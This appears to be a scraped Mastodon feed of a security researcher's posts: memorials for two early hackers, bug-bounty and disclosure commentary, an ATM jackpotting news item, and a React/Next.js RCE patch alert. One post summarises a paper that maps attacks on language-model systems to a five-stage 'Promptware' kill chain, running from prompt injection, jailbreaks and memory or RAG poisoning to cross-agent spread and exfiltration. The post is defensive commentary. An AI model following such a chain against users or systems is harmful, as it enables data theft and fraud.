@obrientg That's Par! Just 20 years younger than in the first photo.
Chris Wysopal
Co-founder/Chief Security Evangelist Veracode. Former L0pht security researcher. Builds tools to find vulnerabilities in code at scale. Twitter: @weldpond
Twitter
https://www.twitter.com/WeldPond :verified:
If you have any photos or stories to share please reply here. This is a photo of Par in Times Square during HOPE in 2006.
RE: https://infosec.exchange/@Weld/116100770024505311
🕯️ Jason Snitker "Parmaster" Memorial 🕯️
Feb 28, 2026 04:00 PM
Debra Kavaler Wysopal will be hosting this online memorial service for Parmaster along with Jason's family from Atlantic City, NJ.
Confirmed Speakers:
Par's Aunt
Deb
Mudge
John Lee
Tom Sloan (former Secret Service)
The memorial service will be recorded.
Registration Link: https://us02web.zoom.us/meeting/register/hYD6OW0URGaIUG5qA18zXw
My wife Deb and I are heartbroken to share the sad news that our old friend Jason Snitker AKA Parmaster has passed away.
Par was one of the sharpest and most elusive minds of the early underground hacking scene. As chronicled in “Underground”, he spent years navigating the emerging digital frontier, connecting with hackers internationally and repeatedly staying ahead of the United States Secret Service during a prolonged investigation in the early 1990s.
His story in “Underground” includes the Citibank investigation that helped trigger the pursuit, as well as his time in custody at Rikers Island, where he found himself playing Dungeons & Dragons.
Par’s life reflected both the intensity of the early hacking world and the very real consequences that came with it. He was part of a generation that explored the edges of a new technological landscape before most of the world even understood it existed.
There will be an online memorial gathering on Feb 28. More details to follow.
The old-school hacking community has lost a true original. Rest in peace, Par. If anyone has stories or memories, please share them here.
New $10k FULU bug bounty for Ring video doorbells just announced. https://bounties.fulu.org/bounties/ring-video-doorbells
In order to collect a bug bounty, a researcher was required to sign an NDA to not discuss the vulnerability.
Hackers & vendors working together on coordinated disclosure led to working together to secure products, systems and networks
Vulnerability disclosure norms are a control system for incentives. They made vulnerability handling predictable enough to industrialize.
We get more finding, more fixing, and more secure software.
ATM Jackpotting, still alive in 2025
Two attackers physically popped ATMs, plugged in a laptop, dropped malware, and forced machines to dump all cash.
This isn’t an isolated case. DOJ has charged dozens tied to multi-state jackpotting rings, including members of Tren de Aragua. Same playbook, scaled.
Props where due: this entire class of attacks was dragged into the open by Barnaby Jack, who live-demoed ATM jackpotting at Black Hat in 2010 and literally coined the term. He showed that ATMs were just poorly defended computers with cash attached.
“Prompt injection” is a misleading label.
What we’re seeing in real LLM systems looks a lot more like malware campaigns than single-shot exploits.
This paper argues LLM attacks are a new malware class, Promptware, and maps them to a familiar 5-stage kill chain:
• Initial access (prompt injection)
• Priv esc (jailbreaks)
• Persistence (memory / RAG poisoning)
• Lateral movement (cross-agent / cross-user spread)
• Actions on objective (exfil, fraud, execution)
If you’ve ever thought: “why does this feel like 90s/2000s malware all over again?", that’s the point.
Security theater around “guardrails” misses the real issue:
models can’t reliably distinguish instructions from data
assume initial access. Design for containment
"A draft amendment to the BND Act, circulating by German media, would transform the agency’s reach by authorizing it to break into foreign digital systems, collect and store large portions of internet traffic, and analyze those communications retroactively."
https://reclaimthenet.org/germany-bnd-surveillance-law-expansion-de-cix-data-retention-hacking
Before bug bounties, before root shells, before the word hacker meant anything at all there was a blind kid who whistled 2600 Hz and bent Ma Bell to his will.
Joybubbles tells the story of Joe Engressi, the original phone phreak and a reminder that hacking started as curiosity, play, and defiance.
Sundance screening.
https://festival.sundance.org/program/film/6932fad21a5535277891b127
CES Worst in Show is a reminder that “innovation” now means:
more attack surface, less ownership, permanent surveillance, and DRM on objects you physically bought.
Congratulations to the ad-powered fridge for completing the arc.
“The Conscience of a Hacker” by The Mentor is 40 years old today.
I’m pleased to be serving on the conference committee and review board for [un]prompted, a new practitioner-led AI security conference taking place March 3–4 at Salesforce Tower in San Francisco.
This event is intentionally community-focused and grounded in reality. The emphasis is on what actually works in AI security today—from simple tools and practical approaches, through strategy and governance, all the way to offensive and defensive techniques.
If you’re working hands-on with AI systems, I strongly encourage you to submit a talk. Take a look at the conference, the CFP, and the review board’s guidance on the kinds of submissions we’re hoping to see.
It should be a smart, useful, and enjoyable event—and, as the site puts it, a chance to take AI back from the marketers.
🚨 Critical React + Next.js RCE Alert 🚨
New flaws in the React Server Components “Flight” protocol (CVE-2025-55182 & CVE-2025-66478) allow unauthenticated remote code execution on default installations.
Attackers only need one malicious HTTP request to take over a server.
Wiz reports 39% of cloud environments are vulnerable.
If you're running:
• React 19.0–19.2
• Next.js 14.3.0-canary, 15.x, 16.x (App Router)
• Any framework bundling react-server (Redwood, Waku, Vite/Parcel RSC plugins, etc.)
👉 You are likely exposed. Patch immediately.
Updates now available:
React 19.0.1 / 19.1.2 / 19.2.1
Next.js 14.3.0-canary.88 / 15.0.5+ / 16.0.7
Full RCE. Remote. Unauthenticated. Near-100% exploit reliability.
Patch today. Do not wait.
Veracode Research finds that OpenAI GPT-5 writes more secure code than other models.
Delchi and I having a pre-party discussion at @L0phtHeavyInd circa 1999
I'm heartbroken to share that my friend of 30 years, Arthur Phillip Delchi, @Delchi, DJ Delchi, FIRST REGENT OF GOTHAM—has left us.
A founding force behind DEF CON’s Hackers with Disabilities village, a L0pht regular who DJed our wildest parties (two of those moments captured below), and an early researcher tearing apart IoT and other devices for the sheer love of understanding how things break.
He was just as legendary in the NYC goth scene: From the earliest days spinning ethereal sets at Parallax, Long Black Veil, Sanctum at CBGB’s Basement, and his own Bitter Paradise at Downtime… to guest spots at Absolution, Albion, The Bank, Webster Hall, and beyond… to carrying the dark flame to Vegas in recent years—Delchi was a pillar of the night.
He lived in the pages too, as “The Voltoids Guy” in Voltaire’s Oh My Goth and “Lord Delchi” in GloomCookie, before becoming a comic creator himself with his comic Noduttu.
Rest easy, old friend. The dance floor, the lab, and the shadows won’t be the same without you.
Hail and farewell, traveler.
Client Info
Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst